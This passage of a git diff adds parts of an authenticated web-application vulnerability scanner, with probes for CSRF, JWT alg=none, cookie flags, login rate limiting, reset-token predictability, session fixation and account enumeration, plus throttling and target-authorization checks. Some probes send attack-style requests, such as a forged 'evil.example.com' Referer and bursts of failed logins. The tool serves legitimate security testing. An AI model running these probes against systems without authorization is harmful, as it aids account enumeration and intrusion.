severity="LOW", + owasp="A02:2021", + cwe=["CWE-693"], + evidence=[f"missing_headers={', '.join(missing)}"], + remediation="Add security headers: " + ", ".join(missing), + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-03", + title="Security headers — all present", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"headers_checked={len(checked)}"], + )) + + def _test_cookie_attributes(self): + """PT-A02-04: check session cookie security attributes.""" + if not self.auth.official_session: + return + + cookies = self.auth.official_session.cookies + issues = [] + for cookie in cookies: + if not cookie.secure: + issues.append(f"{cookie.name}:missing_Secure") + if not cookie.has_nonstandard_attr("HttpOnly"): + issues.append(f"{cookie.name}:missing_HttpOnly") + samesite = cookie.get_nonstandard_attr("SameSite") + if not samesite or samesite.lower() == "none": + issues.append(f"{cookie.name}:weak_SameSite={samesite or 'absent'}") + + if issues: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-04", + title="Insecure cookie attributes", + status="vulnerable", + severity="LOW", + owasp="A02:2021", + cwe=["CWE-614"], + evidence=issues, + remediation="Set Secure, HttpOnly, and SameSite=Strict on all session cookies.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-04", + title="Cookie attributes — all secure", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=["all_cookies_have_secure_attributes"], + )) + + def _test_csrf_bypass(self): + """ + PT-A02-05: test if CSRF protection is enforced on state-changing endpoints. + + Submit POST without CSRF token to state-changing endpoints. + If the server accepts → CSRF bypass detected. 
+ """ + if not self.auth.official_session: + return + + csrf_test_endpoints = [] + for ep in self.target_config.business_logic.workflow_endpoints: + path = ep.path.replace("{id}", "1") if "{id}" in ep.path else ep.path + csrf_test_endpoints.append(path) + for form in self.discovered_forms: + if form == self.target_config.login_path: + continue + csrf_test_endpoints.append(form) + + if not csrf_test_endpoints: + return + + tested = 0 + vulnerable_endpoints = [] + for path in csrf_test_endpoints[:5]: + self.safety.throttle() + url = self.target_url + path + try: + resp = self.auth.official_session.post( + url, data={"test": "csrf_probe"}, timeout=10, + headers={"Referer": "http://evil.example.com"}, + ) + except Exception: + continue + tested += 1 + body_lower = resp.text.lower() + csrf_rejected = any(m in body_lower for m in [ + "csrf", "forbidden", "token", "invalid request", + ]) or resp.status_code == 403 + if not csrf_rejected and resp.status_code < 400: + vulnerable_endpoints.append(path) + + if vulnerable_endpoints: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-05", + title="CSRF protection bypass", + status="vulnerable", + severity="HIGH", + owasp="A02:2021", + cwe=["CWE-352"], + attack=["T1185"], + evidence=[ + f"endpoints_without_csrf={', '.join(vulnerable_endpoints)}", + f"endpoints_tested={tested}", + ], + replay_steps=[ + "Log in as authenticated user.", + f"POST to {vulnerable_endpoints[0]} without CSRF token.", + "Observe request accepted despite missing CSRF protection.", + ], + remediation="Enforce CSRF tokens on all state-changing endpoints. " + "Use SameSite=Strict cookies as defense-in-depth.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-05", + title="CSRF protection — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"endpoints_tested={tested}"], + )) + + def _test_session_token(self): + """ + PT-A02-06: basic session token quality checks. 
+
+        Tests JWT alg=none, short session IDs.
+        """
+        if not self.auth.official_session:
+            return
+
+        import base64
+        import json as _json
+        evidence = []
+        status = "not_vulnerable"
+
+        cookies = self.auth.official_session.cookies.get_dict()
+        for name, value in cookies.items():
+            # Three dot-separated segments → treat as a candidate JWT.
+            parts = value.split(".")
+            if len(parts) == 3:
+                try:
+                    # Restore base64url padding: "-len % 4" adds 0..3 chars.
+                    # (The previous "4 - len % 4" appended "====" when the
+                    # segment was already aligned, making b64decode raise and
+                    # silently skipping the alg=none check for those tokens.)
+                    header_b64 = parts[0] + "=" * (-len(parts[0]) % 4)
+                    header = _json.loads(base64.urlsafe_b64decode(header_b64))
+                    alg = header.get("alg", "")
+                    if alg.lower() == "none":
+                        evidence.append(f"jwt_alg_none=True; cookie={name}")
+                        status = "vulnerable"
+                    elif alg.upper().startswith("HS") and len(parts[2]) < 10:
+                        # HMAC JWT with an implausibly short signature segment.
+                        evidence.append(f"jwt_weak_signature=True; cookie={name}")
+                        if status == "not_vulnerable":
+                            status = "inconclusive"
+                except Exception:
+                    # Not a decodable JWT header — ignore this cookie.
+                    pass
+
+            # Non-JWT tokens: flag very short alphanumeric session IDs.
+            if len(value) < 16 and any(c.isalnum() for c in value):
+                evidence.append(f"short_session_token={name}; length={len(value)}")
+                if status == "not_vulnerable":
+                    status = "inconclusive"
+
+        severity = "HIGH" if status == "vulnerable" else (
+            "LOW" if status == "inconclusive" else "INFO"
+        )
+        self.findings.append(GrayboxFinding(
+            scenario_id="PT-A02-06",
+            title="Session token weakness detected" if status != "not_vulnerable" else "Session token quality",
+            status=status,
+            severity=severity,
+            owasp="A02:2021",
+            cwe=["CWE-331", "CWE-345"] if evidence else [],
+            evidence=evidence or ["all_tokens_appear_adequate"],
+            remediation="Use cryptographically random session IDs (128+ bits). "
+                        "Never use alg=none in JWT. Validate JWT signatures server-side.",
+        ))
+
+    def _test_login_rate_limiting(self):
+        """
+        PT-A02-07: test if login endpoint enforces rate limiting or account lockout.
+
+        Sends a bounded burst of failed login attempts and checks whether the
+        server blocks, throttles, or continues to accept them unchanged.
+ """ + session = self.auth.make_anonymous_session() + login_url = self.target_url + self.target_config.login_path + + try: + page = session.get(login_url, timeout=10) + except Exception: + session.close() + return + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Use a non-existent username to avoid locking a real account + test_username = "ratelimit_probe_user_nonexist" + attempts = 8 + blocked = False + lockout_markers = [ + "account locked", "too many attempts", "temporarily blocked", + "account suspended", "try again later", "rate limit", + ] + + for i in range(attempts): + self.safety.throttle(min_delay=0.1) + + # Re-extract CSRF token each time (some frameworks rotate it) + if csrf_field and i > 0: + try: + page = session.get(login_url, timeout=10) + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + except Exception: + pass + + payload = { + self.target_config.username_field: test_username, + self.target_config.password_field: f"wrong_password_{i}", + } + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + try: + resp = session.post( + login_url, data=payload, + headers={"Referer": login_url}, + timeout=10, + ) + except Exception: + continue + + if resp.status_code == 429: + blocked = True + break + body_lower = resp.text.lower() + if any(m in body_lower for m in lockout_markers): + blocked = True + break + + session.close() + + if not blocked: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-07", + title="Login rate limiting not enforced", + status="vulnerable", + severity="MEDIUM", + owasp="A02:2021", + cwe=["CWE-307"], + attack=["T1110"], + evidence=[ + f"endpoint={login_url}", + f"attempts={attempts}", + "lockout_triggered=False", + "rate_limiting_detected=False", + ], + replay_steps=[ + f"Send {attempts} failed login attempts in rapid succession.", + "Observe no lockout or rate limiting response.", + ], 
+                remediation="Implement account lockout after repeated failures. "
+                            "Add rate limiting (e.g. 429 responses) on login endpoints.",
+            ))
+        else:
+            self.findings.append(GrayboxFinding(
+                scenario_id="PT-A02-07",
+                title="Login rate limiting — enforced",
+                status="not_vulnerable",
+                severity="INFO",
+                owasp="A02:2021",
+                evidence=[
+                    f"endpoint={login_url}",
+                    f"lockout_triggered_after={attempts}_or_fewer_attempts",
+                ],
+            ))
+
+    def _test_password_reset_token(self):
+        """
+        PT-A07-02: test password reset token predictability.
+
+        Requests two reset tokens for the same user and checks:
+        1. Token is exposed in the response body (info leak).
+        2. Token matches a predictable pattern (e.g. reset-{username}).
+        3. Token is identical across requests (no randomness).
+        """
+        reset_path = self.target_config.password_reset_path
+        if not reset_path:
+            return
+
+        session = self.auth.make_anonymous_session()
+        reset_url = self.target_url + reset_path
+        # Request resets for a fixed, commonly-present account name. The
+        # previous expression ("username_field and 'admin'") evaluated to the
+        # *field-name config value* whenever that value was falsy, instead of
+        # a username — the intent was always the literal default.
+        test_username = "admin"
+
+        # Get CSRF token for the reset form
+        try:
+            page = session.get(reset_url, timeout=10)
+        except Exception:
+            session.close()
+            return
+
+        if page.status_code == 404:
+            # No reset form at the configured path — nothing to test.
+            session.close()
+            return
+
+        csrf_field = self.auth.detected_csrf_field
+        csrf_token = None
+        if csrf_field:
+            csrf_token = self.auth.extract_csrf_value(page.text, csrf_field)
+
+        import re
+        tokens = []
+        for i in range(2):
+            self.safety.throttle()
+            # Re-fetch the form on the second pass — some frameworks rotate
+            # the CSRF token per request.
+            if i > 0 and csrf_field:
+                try:
+                    page = session.get(reset_url, timeout=10)
+                    csrf_token = self.auth.extract_csrf_value(page.text, csrf_field)
+                except Exception:
+                    pass
+
+            payload = {"username": test_username}
+            if csrf_token and csrf_field:
+                payload[csrf_field] = csrf_token
+
+            try:
+                resp = session.post(
+                    reset_url, data=payload,
+                    headers={"Referer": reset_url},
+                    timeout=10, allow_redirects=True,
+                )
+            except Exception:
+                continue
+
+            # Look for token-like strings in the response
+            body = resp.text
+            # Common patterns: "token": "...",
token=..., /confirm?token=... + token_patterns = [ + re.compile(r'reset[-_]token["\s:=]+([a-zA-Z0-9_-]{4,})', re.I), + re.compile(r'token["\s:=]+([a-zA-Z0-9_-]{8,})', re.I), + re.compile(r'Your reset (?:token|code)[^<]*?(\S{4,})', re.I), + # Direct token display (e.g. "reset-admin") + re.compile(r'(reset-\w+)', re.I), + ] + for pat in token_patterns: + m = pat.search(body) + if m: + tokens.append(m.group(1)) + break + + session.close() + + evidence = [] + status = "not_vulnerable" + issues = [] + + if len(tokens) >= 1: + evidence.append(f"token_exposed_in_response=True") + issues.append("token_leaked_in_body") + + if len(tokens) >= 2 and tokens[0] == tokens[1]: + evidence.append(f"tokens_identical=True") + issues.append("no_randomness") + + for token in tokens: + # Check for predictable format: reset-{username} + if token.lower() == f"reset-{test_username}".lower(): + evidence.append(f"predictable_token_format=reset-{{username}}") + issues.append("predictable_format") + break + # Check for very short tokens + if len(token) < 16: + evidence.append(f"token_length={len(token)}") + issues.append("short_token") + break + + if "predictable_format" in issues or "no_randomness" in issues: + status = "vulnerable" + elif "token_leaked_in_body" in issues or "short_token" in issues: + status = "inconclusive" + + if status == "vulnerable": + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Predictable password reset tokens", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-640", "CWE-330"], + attack=["T1110"], + evidence=evidence, + replay_steps=[ + f"POST to {reset_path} with username={test_username}.", + "Extract token from response body.", + "Observe token matches predictable pattern.", + ], + remediation="Use cryptographically random tokens (128+ bits). " + "Never expose tokens in HTML responses. 
" + "Enforce single-use and short expiration.", + )) + elif status == "inconclusive": + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Password reset token — potential weakness", + status="inconclusive", + severity="LOW", + owasp="A07:2021", + cwe=["CWE-640"], + evidence=evidence, + remediation="Use cryptographically random tokens (128+ bits). " + "Do not expose tokens in HTML responses.", + )) + elif tokens: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Password reset token — no weakness detected", + status="not_vulnerable", + severity="INFO", + owasp="A07:2021", + evidence=[f"tokens_checked={len(tokens)}"], + )) + + def _test_session_fixation(self): + """ + PT-A07-03: test if session token rotates after successful login. + + Session fixation occurs when the session ID remains the same before + and after authentication. An attacker who can set a pre-auth session + cookie (via XSS, URL injection, or subdomain) gains full access once + the victim logs in with that same session ID. + + Compares pre-auth cookies from a fresh anonymous session against the + post-auth cookies on the already-established official session. + Read-only: does not perform additional logins. 
+ """ + if not self.auth.official_session: + return + + login_url = self.target_url + self.target_config.login_path + + # Step 1: GET login page with a fresh session, capture pre-auth cookies + pre_session = self.auth.make_anonymous_session() + try: + pre_session.get(login_url, timeout=10, allow_redirects=True) + except Exception: + pre_session.close() + return + + pre_cookies = pre_session.cookies + if hasattr(pre_cookies, "get_dict"): + pre_cookies = pre_cookies.get_dict() + else: + pre_cookies = dict(pre_cookies) + + pre_session.close() + + if not pre_cookies: + return # no pre-auth cookies → can't test fixation + + # Step 2: get post-auth cookies from the existing official session + post_cookies = self.auth.official_session.cookies + if hasattr(post_cookies, "get_dict"): + post_cookies = post_cookies.get_dict() + else: + post_cookies = dict(post_cookies) + + if not post_cookies: + return # no post-auth cookies → can't compare + + # Step 3: compare session cookies + # Find cookies that exist in BOTH pre-auth and post-auth with the same value + csrf_field = self.auth.detected_csrf_field + csrf_names = {"csrftoken", "csrf_token", "_csrf"} + if csrf_field: + csrf_names.add(csrf_field.lower()) + + fixed_cookies = [] + for name, pre_value in pre_cookies.items(): + post_value = post_cookies.get(name) + if post_value and pre_value == post_value: + # Skip CSRF tokens — they're not session identifiers + if name.lower() in csrf_names: + continue + fixed_cookies.append(name) + + if fixed_cookies: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-03", + title="Session fixation — token not rotated after login", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-384"], + attack=["T1550"], + evidence=[ + f"fixed_cookies={','.join(fixed_cookies)}", + "pre_auth_value_equals_post_auth_value=True", + ], + replay_steps=[ + "Obtain a pre-authentication session cookie.", + "Log in using valid credentials.", + "Observe that the session cookie value 
did not change.",
+                    "An attacker who sets this cookie before login inherits the authenticated session.",
+                ],
+                remediation="Regenerate session ID after successful authentication. "
+                            "Django: this is automatic. Flask: call session.regenerate(). "
+                            "Rails: call reset_session in the login action.",
+            ))
+        else:
+            self.findings.append(GrayboxFinding(
+                scenario_id="PT-A07-03",
+                title="Session fixation — token properly rotated",
+                status="not_vulnerable",
+                severity="INFO",
+                owasp="A07:2021",
+                evidence=[
+                    f"pre_auth_cookies={len(pre_cookies)}",
+                    f"post_auth_cookies={len(post_cookies)}",
+                    "all_session_tokens_rotated=True",
+                ],
+            ))
+
+    def _test_account_enumeration(self):
+        """
+        PT-A07-04: test if login responses differ for valid vs invalid usernames.
+
+        Compares error responses when submitting:
+        1. A known-valid username with a wrong password
+        2. A definitely-invalid username with a wrong password
+
+        If the responses differ (different error message, status code, or
+        response length), attackers can enumerate valid accounts.
+
+        Read-only: only submits failed login attempts.
+        """
+        login_url = self.target_url + self.target_config.login_path
+
+        # We need a known-valid username. AuthManager does not store the actual
+        # username value, so prefer the regular_username supplied at probe init
+        # and fall back to a common default. (A dead assignment of the *field
+        # name* that was immediately overwritten has been removed here.)
+ valid_username = self.regular_username or "admin" + + invalid_username = "enum_probe_nonexistent_user_x9z7q" + wrong_password = "wrong_password_probe" + + session = self.auth.make_anonymous_session() + + def _submit_login(username): + """Submit a failed login and return (status_code, body, content_length).""" + try: + page = session.get(login_url, timeout=10) + except Exception: + return None + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + payload = { + self.target_config.username_field: username, + self.target_config.password_field: wrong_password, + } + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + try: + resp = session.post( + login_url, data=payload, + headers={"Referer": login_url}, + timeout=10, allow_redirects=True, + ) + except Exception: + return None + + return (resp.status_code, resp.text, len(resp.text)) + + self.safety.throttle() + result_valid = _submit_login(valid_username) + self.safety.throttle() + result_invalid = _submit_login(invalid_username) + + session.close() + + if not result_valid or not result_invalid: + return + + status_valid, body_valid, len_valid = result_valid + status_invalid, body_invalid, len_invalid = result_invalid + + differences = [] + + # Check status code difference + if status_valid != status_invalid: + differences.append(f"status_code: valid={status_valid}, invalid={status_invalid}") + + # Check for different error messages + # Extract the specific error text near common patterns + import re + error_patterns = [ + r'(?:class=["\'][^"\']*error[^"\']*["\'][^>]*>)(.*?)<', + r'(?:class=["\'][^"\']*alert[^"\']*["\'][^>]*>)(.*?)<', + r'(?:class=["\'][^"\']*message[^"\']*["\'][^>]*>)(.*?)<', + ] + msg_valid = "" + msg_invalid = "" + for pat in error_patterns: + m_valid = re.search(pat, body_valid, re.I | re.DOTALL) + m_invalid = re.search(pat, body_invalid, re.I | re.DOTALL) + if m_valid: + msg_valid 
= m_valid.group(1).strip() + if m_invalid: + msg_invalid = m_invalid.group(1).strip() + if msg_valid and msg_invalid: + break + + if msg_valid and msg_invalid and msg_valid != msg_invalid: + differences.append(f"error_message: valid_user='{msg_valid[:80]}', " + f"invalid_user='{msg_invalid[:80]}'") + + # Check response length difference (>10% threshold to avoid noise) + if len_valid > 0 and len_invalid > 0: + ratio = abs(len_valid - len_invalid) / max(len_valid, len_invalid) + if ratio > 0.10: + differences.append(f"response_length: valid={len_valid}, invalid={len_invalid}") + + if differences: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-04", + title="Account enumeration via login response differences", + status="vulnerable", + severity="MEDIUM", + owasp="A07:2021", + cwe=["CWE-204"], + attack=["T1078"], + evidence=differences, + replay_steps=[ + f"Submit login with valid username '{valid_username}' and wrong password.", + f"Submit login with invalid username '{invalid_username}' and wrong password.", + "Compare responses — differences reveal account existence.", + ], + remediation="Return identical error messages for all failed login attempts. " + "Use generic text like 'Invalid credentials' regardless of " + "whether the username exists.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-04", + title="Account enumeration — responses consistent", + status="not_vulnerable", + severity="INFO", + owasp="A07:2021", + evidence=[ + f"status_codes_match={status_valid == status_invalid}", + f"response_lengths_similar=True", + ], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/safety.py b/extensions/business/cybersec/red_mesh/graybox/safety.py new file mode 100644 index 00000000..c46126b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/safety.py @@ -0,0 +1,91 @@ +""" +Safety controls for graybox scanning. + +Rate limiting, attempt budgeting, and target validation. 
+"""
+
+import time
+from urllib.parse import urlparse
+
+from ..constants import (
+    GRAYBOX_DEFAULT_DELAY,
+    GRAYBOX_WEAK_AUTH_DELAY,
+    GRAYBOX_MAX_WEAK_ATTEMPTS,
+)
+
+
+class SafetyControls:
+    """Rate limiting, attempt budgeting, and target validation."""
+
+    def __init__(self, request_delay=None, weak_auth_delay=None,
+                 target_is_local=False):
+        self._request_delay = request_delay or GRAYBOX_DEFAULT_DELAY
+        self._weak_auth_delay = weak_auth_delay or GRAYBOX_WEAK_AUTH_DELAY
+        # Monotonic timestamp of the last throttled request; None means no
+        # request has been issued yet (first call never sleeps).
+        self._last_request_at = None
+        # Enforce minimum delay for non-local targets to avoid
+        # triggering WAF blocking or causing DoS on resource-constrained targets.
+        if not target_is_local and self._request_delay < GRAYBOX_DEFAULT_DELAY:
+            self._request_delay = GRAYBOX_DEFAULT_DELAY
+
+    def throttle(self, min_delay=None):
+        """Enforce minimum delay between requests.
+
+        Uses time.monotonic() rather than time.time(): a wall-clock step
+        (NTP sync, manual adjustment) must neither trigger a huge spurious
+        sleep nor silently defeat the pacing.
+        """
+        delay = min_delay or self._request_delay
+        if self._last_request_at is not None:
+            elapsed = time.monotonic() - self._last_request_at
+            if elapsed < delay:
+                time.sleep(delay - elapsed)
+        self._last_request_at = time.monotonic()
+
+    def throttle_auth(self):
+        """Throttle for auth attempts (higher delay)."""
+        self.throttle(min_delay=self._weak_auth_delay)
+
+    @staticmethod
+    def clamp_attempts(requested: int) -> int:
+        """Enforce hard cap on weak-auth attempts (clamped to [0, max])."""
+        return min(max(requested, 0), GRAYBOX_MAX_WEAK_ATTEMPTS)
+
+    @staticmethod
+    def is_local_target(target_url: str) -> bool:
+        """Check if target is localhost/loopback."""
+        parsed = urlparse(target_url)
+        hostname = (parsed.hostname or "").lower()
+        return hostname in ("localhost", "127.0.0.1", "0.0.0.0", "::1",
+                            "host.docker.internal")
+
+    @staticmethod
+    def validate_target(target_url: str, authorized: bool) -> str | None:
+        """
+        Validate target URL before scanning.
+
+        Returns error message if invalid, None if OK.
+        """
+        if not authorized:
+            return "Scan not authorized. Set authorized=True to confirm."
+ + parsed = urlparse(target_url) + if not parsed.scheme or not parsed.hostname: + return f"Invalid target URL: {target_url}" + if parsed.scheme not in ("http", "https"): + return f"Unsupported scheme: {parsed.scheme}" + + # Block obviously wrong targets + blocked = {"google.com", "facebook.com", "amazon.com", "github.com"} + hostname = parsed.hostname.lower() + for domain in blocked: + if hostname == domain or hostname.endswith("." + domain): + return f"Target {hostname} is a public service. Refusing scan." + + return None + + @staticmethod + def sanitize_error(msg: str) -> str: + """ + Remove potential credential leaks from error messages. + + Scrubs password= patterns and common secret markers. + """ + import re + msg = re.sub(r'password["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'password=***', msg, flags=re.I) + msg = re.sub(r'secret["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'secret=***', msg, flags=re.I) + msg = re.sub(r'token["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'token=***', msg, flags=re.I) + return msg diff --git a/extensions/business/cybersec/red_mesh/graybox/worker.py b/extensions/business/cybersec/red_mesh/graybox/worker.py new file mode 100644 index 00000000..444d54b0 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/worker.py @@ -0,0 +1,490 @@ +""" +Graybox (authenticated webapp) scan worker. + +Inherits from BaseLocalWorker (Phase 0) and orchestrates: +Preflight → Authentication → Route Discovery → Probes → Weak Auth → Cleanup. 
+""" + +import importlib +from urllib.parse import urlparse + +from ..worker.base import BaseLocalWorker +from ..constants import GRAYBOX_PROBE_REGISTRY +from .findings import GrayboxEvidenceArtifact, GrayboxFinding +from .auth import AuthManager +from .discovery import DiscoveryModule +from .safety import SafetyControls +from .models import ( + DiscoveryResult, + GrayboxCredentialSet, + GrayboxProbeContext, + GrayboxProbeDefinition, + GrayboxProbeRunResult, + GrayboxTargetConfig, +) + +# Weak auth uses a direct import (not the registry) because it is a +# distinct pipeline phase, not a generic probe. +from .probes.business_logic import BusinessLogicProbes + + +class GrayboxLocalWorker(BaseLocalWorker): + PHASE_PLAN = ( + ("preflight", "_run_preflight_phase"), + ("authentication", "_run_authentication_phase"), + ("discovery", "_run_discovery_phase"), + ("graybox_probes", "_run_probe_phase"), + ("weak_auth", "_run_weak_auth_phase"), + ) + + """ + Authenticated webapp probe worker. + + Inherits from BaseLocalWorker (Phase 0), which provides: + - self.owner, self.job_id, self.initiator, self.target + - self.local_worker_id (format "RM-{prefix}-{uuid[:4]}") + - self.thread, self.stop_event (set by inherited start()) + - self.metrics (MetricsCollector instance) + - self.initial_ports (declared, subclass populates) + - self.state (declared as {}, subclass populates with full key set) + - start(), stop(), _check_stopped(), P() — all inherited, not redefined + + Uses the two-layer finding architecture: + - Probes create GrayboxFinding instances (layer 1) + - Worker stores serialized findings in state["graybox_results"] (layer 2) + - pentester_api_01.py normalizes them into flat finding dicts via + _compute_risk_and_findings() + """ + + def __init__(self, owner, job_id, target_url, job_config, + local_id="1", initiator=""): + parsed = urlparse(target_url) + + super().__init__( + owner=owner, + job_id=job_id, + initiator=initiator, + local_id_prefix=local_id, + 
target=parsed.hostname, + ) + + self.target_url = target_url.rstrip("/") + self.job_config = job_config + self._port = parsed.port or (443 if parsed.scheme == "https" else 80) + self._port_key = str(self._port) + + self.initial_ports = [self._port] + + self.target_config = GrayboxTargetConfig.from_dict( + job_config.target_config or {} + ) + + # Modules (composition) + self.safety = SafetyControls( + request_delay=job_config.scan_min_delay or None, + target_is_local=SafetyControls.is_local_target(target_url), + ) + self.auth = AuthManager( + target_url=self.target_url, + target_config=self.target_config, + verify_tls=job_config.verify_tls, + ) + self.discovery = DiscoveryModule( + target_url=self.target_url, + auth_manager=self.auth, + safety=self.safety, + target_config=self.target_config, + ) + + self.state = { + "job_id": job_id, + "initiator": initiator, + "target": parsed.hostname, + "scan_type": "webapp", + "target_url": self.target_url, + "open_ports": [self._port], + "ports_scanned": [self._port], + "port_protocols": {self._port_key: parsed.scheme}, + "service_info": {}, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": {}, + "completed_tests": [], + "done": False, + "canceled": False, + } + self._phase = "" + self._credentials = GrayboxCredentialSet.from_job_config(job_config) + + @classmethod + def get_feature_prefixes(cls): + """Return feature prefixes for compatibility with capability discovery.""" + return ["_graybox_"] + + @classmethod + def get_supported_features(cls, categs=False): + """Return supported graybox features from the explicit probe registry.""" + features = [probe.key for probe in cls._iter_probe_definitions()] + ["_graybox_weak_auth"] + if categs: + return {"graybox": features} + return features + + @staticmethod + def _iter_probe_definitions(): + return [GrayboxProbeDefinition.from_entry(entry) for entry in GRAYBOX_PROBE_REGISTRY] + + # start(), stop(), _check_stopped(), P() are ALL inherited from + # 
BaseLocalWorker. NOT redefined here. + + def get_status(self, for_aggregations=False): + """Return worker state for aggregation by pentester_api_01.py.""" + status = dict(self.state) + scenario_stats = self._compute_scenario_stats() + metrics = self.metrics.build().to_dict() + metrics.update({ + "scenarios_total": scenario_stats["total"], + "scenarios_vulnerable": scenario_stats["vulnerable"], + "scenarios_clean": scenario_stats["not_vulnerable"], + "scenarios_inconclusive": scenario_stats["inconclusive"], + "scenarios_error": scenario_stats["error"], + }) + status["scan_metrics"] = metrics + status["scenario_stats"] = scenario_stats + + if not for_aggregations: + status["local_worker_id"] = self.local_worker_id + status["done"] = self.state["done"] + status["canceled"] = self.state["canceled"] + status["progress"] = self._phase or "initializing" + + return status + + def execute_job(self): + """Preflight → Auth → Discover → Probes → Weak Auth → Cleanup → Done.""" + discovery_result = DiscoveryResult() + self.metrics.start_scan(1) + try: + self._run_preflight_phase() + if self._check_stopped(): + return + + auth_ok = self._run_authentication_phase() + if not auth_ok: + return + + if not self._check_stopped(): + discovery_result = self._run_discovery_phase() + + if not self._check_stopped(): + self._run_probe_phase(discovery_result) + + if not self._check_stopped(): + self._run_weak_auth_phase(discovery_result) + + except Exception as exc: + self._record_fatal(self.safety.sanitize_error(str(exc))) + finally: + self.auth.cleanup() + self.metrics.phase_end(self._phase) + self.state["done"] = True + + def _run_preflight_phase(self): + self._set_phase("preflight") + self.metrics.phase_start("preflight") + target_error = self.safety.validate_target( + self.target_url, self.job_config.authorized, + ) + if target_error: + self._record_fatal(target_error) + return + + preflight_error = self.auth.preflight_check() + if preflight_error: + self._record_fatal(preflight_error) + 
return + + if not self.job_config.verify_tls: + self.P( + f"WARNING: TLS verification disabled for {self.target_url}. " + "Credentials may be intercepted by a MITM attacker.", color='y' + ) + self._store_findings("_graybox_preflight", [GrayboxFinding( + scenario_id="PREFLIGHT-TLS", + title="TLS verification disabled", + status="inconclusive", + severity="LOW", + owasp="A02:2021", + cwe=["CWE-295"], + evidence=[f"verify_tls=False", f"target={self.target_url}"], + remediation="Enable TLS verification or use a trusted certificate.", + )]) + self.metrics.phase_end("preflight") + + def _run_authentication_phase(self) -> bool: + self._set_phase("authentication") + self.metrics.phase_start("authentication") + auth_ok = self.auth.authenticate(self._credentials.official, self._credentials.regular) + self._store_auth_results() + self.state["completed_tests"].append("graybox_auth") + self.metrics.phase_end("authentication") + + if not auth_ok: + self._record_fatal("Official authentication failed. Cannot proceed with graybox scan.") + return False + return True + + def _run_discovery_phase(self) -> DiscoveryResult: + self._set_phase("discovery") + self.metrics.phase_start("discovery") + if not self._ensure_active_sessions("discovery"): + self.metrics.phase_end("discovery") + return DiscoveryResult() + result = None + discover_result = getattr(self.discovery, "discover_result", None) + if callable(discover_result): + maybe_result = discover_result(known_routes=self.job_config.app_routes) + if isinstance(maybe_result, DiscoveryResult): + result = maybe_result + if result is None: + routes, forms = self.discovery.discover( + known_routes=self.job_config.app_routes, + ) + result = DiscoveryResult(routes=routes, forms=forms) + self._store_discovery_results(result.routes, result.forms) + self.state["completed_tests"].append("graybox_discovery") + self.metrics.phase_end("discovery") + return result + + def _build_probe_kwargs(self, discovery_result: DiscoveryResult) -> dict: + return 
GrayboxProbeContext( + target_url=self.target_url, + auth_manager=self.auth, + target_config=self.target_config, + safety=self.safety, + discovered_routes=discovery_result.routes, + discovered_forms=discovery_result.forms, + regular_username=self._credentials.regular.username if self._credentials.regular else "", + allow_stateful=self.job_config.allow_stateful_probes, + ) + + def _run_probe_phase(self, discovery_result: DiscoveryResult): + self._set_phase("graybox_probes") + self.metrics.phase_start("graybox_probes") + if not self._ensure_active_sessions("graybox_probes"): + self.metrics.phase_end("graybox_probes") + return + + probe_context = self._build_probe_kwargs(discovery_result) + excluded_features = set(self.job_config.excluded_features or []) + graybox_excluded = "graybox" in excluded_features + + if not graybox_excluded: + for probe_def in self._iter_probe_definitions(): + if self._check_stopped(): + break + + store_key = probe_def.key + + if store_key in excluded_features: + self.metrics.record_probe(store_key, "skipped:disabled") + continue + + self._run_registered_probe(probe_def, probe_context) + else: + for probe_def in self._iter_probe_definitions(): + self.metrics.record_probe(probe_def.key, "skipped:disabled") + + self.state["completed_tests"].append("graybox_probes") + self.metrics.phase_end("graybox_probes") + + def _run_weak_auth_phase(self, discovery_result: DiscoveryResult): + if ( + self._credentials.weak_candidates + and "_graybox_weak_auth" not in (self.job_config.excluded_features or []) + ): + self._set_phase("weak_auth") + self.metrics.phase_start("weak_auth") + if not self._ensure_active_sessions("weak_auth"): + self.metrics.phase_end("weak_auth") + return + probe_context = self._build_probe_kwargs(discovery_result) + bl_probe = BusinessLogicProbes( + **dict(probe_context.to_kwargs(), allow_stateful=False), + ) + try: + weak_findings = bl_probe.run_weak_auth( + self._credentials.weak_candidates, + self._credentials.max_weak_attempts, + 
